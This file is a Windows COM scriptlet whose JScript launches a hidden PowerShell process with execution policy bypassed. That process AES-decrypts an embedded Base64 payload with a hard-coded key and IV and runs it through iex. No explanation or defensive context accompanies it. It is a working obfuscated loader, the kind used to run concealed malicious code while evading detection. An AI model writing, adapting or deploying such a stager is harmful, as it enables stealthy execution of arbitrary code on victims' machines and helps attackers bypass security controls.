<?XML version="1.0"?>
<scriptlet>
<registration
    description="AESDecryptionExecution"
    progid="AESDecryptionExecution"
    version="1.0"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            try {
                var shell = new ActiveXObject("WScript.Shell");

                var psCommand = "powershell -nop -w hidden -ep bypass -Command \"";
                psCommand += "$encBytes = [Convert]::FromBase64String('ii1VbAwFf0qecIFAU92Y/Zra1f+JgHwk6wX0kOQuCLXw/KTRQkOfXAfytQl0eDhcKIKX3zUUznxY0uc0OKivHZDfb+dnYEjnnER8s030ozY=');";
                psCommand += "$aes = [System.Security.Cryptography.Aes]::Create();";
                psCommand += "$aes.Key = $([Convert]::FromBase64String('JTuTq8hJFYKFyb7+wnfP4VHpDE4n/CqQuTOD26H8ITg='));";
                psCommand += "$aes.IV = $([Convert]::FromBase64String('LJanhQpIF+wKG4xza9PNeQ=='));";
                psCommand += "$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC;";
                psCommand += "$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;";
                psCommand += "$decryptor = $aes.CreateDecryptor();";
                psCommand += "$decBytes = $decryptor.TransformFinalBlock($encBytes, 0, $encBytes.Length);";
                psCommand += "iex $([System.Text.Encoding]::UTF8.GetString($decBytes))\"";

                shell.Run(psCommand, 0, false);
            } catch (e) {
                var shell = new ActiveXObject("WScript.Shell");
                shell.Popup("Error: " + e.message, 0, "Execution Error", 16);
            }
        ]]>
    </script>
</registration>
</scriptlet>
